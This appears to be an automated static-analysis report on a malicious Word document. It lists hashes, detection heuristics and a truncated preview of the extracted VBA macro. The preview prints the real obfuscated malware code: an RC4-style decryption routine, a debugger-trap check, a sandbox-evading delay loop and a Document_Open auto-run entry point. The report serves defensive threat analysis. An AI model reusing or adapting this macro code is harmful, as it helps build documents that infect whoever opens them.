Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1e947c0486787355…

MALICIOUS

Office (OLE)

Size: 179.0 KB
Created: 2016-02-03 15:48:00
Authoring application: Microsoft Office Word
First seen: 2017-11-29
MD5: 41be8a21ee158408d26fa28544694c34
SHA-1: 03ca1c7fb0f29dfb9de3bc927e46bccbe5648f0f
SHA-256: 1e947c048678735590772db24edc8edc87421e75fda8c077188db41117204488
Risk score: 222

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Microsoft Office document containing a VBA macro. The 'Document_Open' macro is configured to execute a shell command, which is a common technique for downloading and executing additional malicious content. The VBA code appears to be obfuscated, but the presence of a Shell() call and the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic strongly indicate malicious intent. The ClamAV detection further supports this assessment.

Heuristics (6)

  • ClamAV: Doc.Trojan.Agent-1383194 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Agent-1383194
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                               | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)  | 81974 bytes
SHA-256: bf4295b2ce7e59bcd0268351a48a8e2b977357936fc67c319ac851512b557dbb

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim JfivWS9SZ7WoqhDd(1964) As Long
Function KJweeS3op7841P8E(SER7vxeZYI0Q() As Byte, ByVal Xs4I3V9EABN6EK As String) As String
On Error Resume Next
Dim TQAQPZSYFYsmuf(0 To 255) As Integer, Qw5H2DwqC3hL2g As Long, TS07fruhrS As Long, Uob3No4WhlZ As Long, A00KNrQsV As Byte, UkG22() As Byte, Gf91c() As Byte
ReDim UkG22(UBound(SER7vxeZYI0Q)) As Byte
UkG22 = SER7vxeZYI0Q
Gf91c = StrConv(Xs4I3V9EABN6EK, (32 + 152 + 32 - 152 + 32 + 152 + 32 - 152))
For Qw5H2DwqC3hL2g = 0 To (64 + 105 + 64 - 105 + 64 + 105 + 64 - 105 - 1)
TQAQPZSYFYsmuf(Qw5H2DwqC3hL2g) = Qw5H2DwqC3hL2g
Next Qw5H2DwqC3hL2g
Qw5H2DwqC3hL2g = 0
TS07fruhrS = 0
Uob3No4WhlZ = 0
For Qw5H2DwqC3hL2g = 0 To (64 + 621 + 64 - 621 + 64 + 621 + 64 - 621 - 1)
TS07fruhrS = (TS07fruhrS + TQAQPZSYFYsmuf(Qw5H2DwqC3hL2g) + Gf91c(Qw5H2DwqC3hL2g Mod Len(Xs4I3V9EABN6EK))) Mod ((64 + 600 + 64 - 600 + 64 + 600 + 64 - 600))
A00KNrQsV = TQAQPZSYFYsmuf(Qw5H2DwqC3hL2g)
TQAQPZSYFYsmuf(Qw5H2DwqC3hL2g) = TQAQPZSYFYsmuf(TS07fruhrS)
TQAQPZSYFYsmuf(TS07fruhrS) = A00KNrQsV
Next Qw5H2DwqC3hL2g
Qw5H2DwqC3hL2g = 0
TS07fruhrS = 0
Uob3No4WhlZ = 0
For Qw5H2DwqC3hL2g = 0 To UBound(SER7vxeZYI0Q)
TS07fruhrS = (TS07fruhrS + 1) Mod 256
Uob3No4WhlZ = (Uob3No4WhlZ + TQAQPZSYFYsmuf(TS07fruhrS)) Mod 256
A00KNrQsV = TQAQPZSYFYsmuf(TS07fruhrS)
TQAQPZSYFYsmuf(TS07fruhrS) = TQAQPZSYFYsmuf(Uob3No4WhlZ)
TQAQPZSYFYsmuf(Uob3No4WhlZ) = A00KNrQsV
UkG22(Qw5H2DwqC3hL2g) = U98MGIgy41PxtG(UkG22(Qw5H2DwqC3hL2g), (TQAQPZSYFYsmuf((TQAQPZSYFYsmuf(TS07fruhrS) + TQAQPZSYFYsmuf(Uob3No4WhlZ)) Mod ((64 + 408 + 64 - 408 + 64 + 408 + 64 - 408)))))
Next Qw5H2DwqC3hL2g
KJweeS3op7841P8E = StrConv(UkG22, (16 + 412 + 16 - 412 + 16 + 412 + 16 - 412))
End Function
Function U98MGIgy41PxtG(Ofw3MR, VGqhXSqhj)
WZHwd = Year(Now) '26
U98MGIgy41PxtG = (Ofw3MR And Not VGqhXSqhj) Or (Not Ofw3MR And VGqhXSqhj)
XfMSsOftg = Year(Now) '51
End Function
Function X6kwgMbNgJ(Ak1HZBnpV As Integer) As Boolean
CMeq1Qt4lApz = Year(Now) '48
Static Ci2s21H7C As Byte
CY23LTC1bd = Year(Now) '82
Ci2s21H7C = Ci2s21H7C + 1
QTs = Year(Now) '87
If Ci2s21H7C = 1 Then Debug.Assert Not X6kwgMbNgJ(39)
MEa5IA2DpUk = Year(Now) '60
X6kwgMbNgJ = Ci2s21H7C = 0
OKHIljrqVgp = Year(Now) '98
Ci2s21H7C = 0
I8LqdGeSl = Year(Now) '89
End Function
Sub DoYYO2UPaL()
YIDVntj3YK2wc = Year(Now) '46
If CDbl(94) = True Then GQaj8PEg = 67
DatePart "EUppxcBiHgB", 75
Log 25
Month 75
FreeFile 96
App.StartLogging "Ct9JP3HTB7K", 85
Err.Clear
DoEvents
BWELN = LCase(21)
IsError 15
MEdt75AApXXWLZ = Year(Now) '67
End Sub
Sub Document_Open()
JaqGPwoPu48YczqN = Year(Now) '37
On Error Resume Next
LWb9ZjskfwlJHS = Year(Now) '74
Dim Ds1jSlIYao5X As Long, RDr2Y As Long, HP85djOxI8AGedne As Long
BzvbUy = Year(Now) '44
Ds1jSlIYao5X = 93364438: RDr2Y = 0: HP85djOxI8AGedne = 0
IonXs47akeQMk = Year(Now) '35
For RDr2Y = 1 To Ds1jSlIYao5X
HP85djOxI8AGedne = HP85djOxI8AGedne + 1
Next RDr2Y
Xt0UUX5QcqO3Ns = Year(Now) '48
If HP85djOxI8AGedne = Ds1jSlIYao5X Then
CP7eYRX89Nn = Year(Now) '23
Dim VoF1MHx9 As Integer, PA2YVLe As String
For VoF1MHx9 = 4 To 426
PA2YVLe = PA2YVLe + VoF1MHx9
Next
Rv1KdBVm1X = Year(Now) '58
If (13.5 + 30 + 13.5 - 30 + 13.5 + 30 + 13.5 - 30 - 1) = (13.5 + 325 + 13.5 - 325 + 13.5 + 325 + 13.5 - 325 - 1) Then
DviWOuB = Year(Now) '48
VVkBYsJicw2DlUAmV = Year(Now) '23
If X6kwgMbNgJ(15) = True Then
YLArIfSr = Year(Now) '14
HDjs9On9a9Y
KwIdzptJqryh = Year(Now) '58
Else
Ia5y06lXt1Vs = Year(Now) '86
DoYYO2UPaL
NMpb0m = Year(Now) '26
End If
Else
DVHXbu3ZcQAc = Year(Now) '8
DoYYO2UPaL
HYGDr = Year(Now) '71
End If
PgeRSvr6icpl = Year(Now) '87
Else
KCxZonr18oR = Year(Now) '1
DoYYO2UPaL
DcDipOwiUXXXD4 = Year(Now) '29
End If
ReCn7 = Year(Now) '87
End Sub
Function Ya3FssyIa(ByVal Rpwp7G0fmiW As Variant) As Long
YxoXhe8cWBdV1F = 
... (truncated)